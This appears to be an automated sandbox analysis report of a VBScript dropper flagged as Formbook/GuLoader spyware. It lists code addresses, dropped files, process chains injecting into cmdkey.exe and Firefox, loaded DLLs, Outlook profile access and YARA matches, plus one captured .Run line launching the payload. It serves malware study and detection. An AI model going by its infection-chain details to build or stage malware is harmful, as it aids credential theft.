        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0340F1135_2_0340F113
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034BD1305_2_034BD130
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034251C05_2_034251C0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0343B1E05_2_0343B1E0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034CE0765_2_034CE076
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0342B0D05_2_0342B0D0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034D70F15_2_034D70F1
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034100A05_2_034100A0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034D67575_2_034D6757
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034227605_2_03422760
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0342A7605_2_0342A760
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034CD6465_2_034CD646
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034446705_2_03444670
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0343C6005_2_0343C600
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034BD62C5_2_034BD62C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DA6C05_2_034DA6C0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0341C6E05_2_0341C6E0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DF6F65_2_034DF6F6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034206805_2_03420680
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034EA5265_2_034EA526
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DF5C95_2_034DF5C9
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034D75C65_2_034D75C6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034204455_2_03420445
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03420B105_2_03420B10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DFB2E5_2_034DFB2E
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03494BC05_2_03494BC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DEA5B5_2_034DEA5B
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DCA135_2_034DCA13
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DFA895_2_034DFA89
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0343FAA05_2_0343FAA0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_033E99E85_2_033E99E8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0341E9A05_2_0341E9A0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DE9A65_2_034DE9A6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034068685_2_03406868
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034298705_2_03429870
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0343B8705_2_0343B870
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DF8725_2_034DF872
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034238005_2_03423800
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034C08355_2_034C0835
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034228C05_2_034228C0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034D78F35_2_034D78F3
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034368825_2_03436882
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DFF635_2_034DFF63
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0342CF005_2_0342CF00
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034D1FC65_2_034D1FC6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03426FE05_2_03426FE0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DEFBF5_2_034DEFBF
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03440E505_2_03440E50
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034C0E6D5_2_034C0E6D
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034D9ED25_2_034D9ED2
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03412EE85_2_03412EE8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034D0EAD5_2_034D0EAD
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03421EB25_2_03421EB2
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034D7D4C5_2_034D7D4C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03420D695_2_03420D69
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0341AD005_2_0341AD00
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DFD275_2_034DFD27
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03429DD05_2_03429DD0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034BFDF45_2_034BFDF4
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03432DB05_2_03432DB0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034CEC4C5_2_034CEC4C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03423C605_2_03423C60
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034D6C695_2_034D6C69
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034DEC605_2_034DEC60
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03410C125_2_03410C12
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0342AC205_2_0342AC20
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03438CDF5_2_03438CDF
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0343FCE05_2_0343FCE0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034EACEB5_2_034EACEB
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_034B9C985_2_034B9C98
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A41DC05_2_00A41DC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A3B1885_2_00A3B188
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A311225_2_00A31122
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A454905_2_00A45490
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A436705_2_00A43670
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A5BB305_2_00A5BB30
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A3CD0C5_2_00A3CD0C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A3CD105_2_00A3CD10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A3AFB05_2_00A3AFB0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_00A3CF305_2_00A3CF30
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0333E3D55_2_0333E3D5
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0333E4F35_2_0333E4F3
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0333E88C5_2_0333E88C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0333D8F85_2_0333D8F8
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsb9D0E.tmp\System.dll 90F3CEBB5B3759EB1BD72CEE7CD8B694440EE398FE970B763DB7A7B67208E4C8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 03467BE4 appears 87 times
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 0348E692 appears 76 times
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 0340B910 appears 245 times
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 0349EF10 appears 99 times
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 03455050 appears 34 times
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 3458EF10 appears 95 times
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 3457E692 appears 72 times
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 344FB910 appears 244 times
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 34545050 appears 34 times
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 34557BE4 appears 79 times
        Source: #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsInitial sample: Strings found which are bigger than 50
        Source: 00000005.00000002.140485141531.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.136238638056.00000000341C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000006.00000002.140483811557.00000000014B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.136239540037.0000000035220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.140485253633.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@9/9@19/14
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004034CE EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,2_2_004034CE
        Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\AppData\Local\dipuskompleks.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs"
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsVirustotal: Detection: 12%
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: susen.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: susen.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsStatic file information: File size 1168335 > 1048576
        Source: Binary string: wntdll.pdb source: x.exe, cmdkey.exe

        Data Obfuscation

        barindex
        VBScript performs obfuscated calls to suspicious functions
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\x.exe", "1", "true");
        Yara detected GuLoader
        Source: Yara matchFile source: 00000003.00000002.136219856391.000000000258E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.136009104486.00000000038BE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_73AD2288 GlobalFree,lstrcpyA,GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,2_2_73AD2288
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345008CD push ecx; mov dword ptr [esp], ecx3_2_345008D6
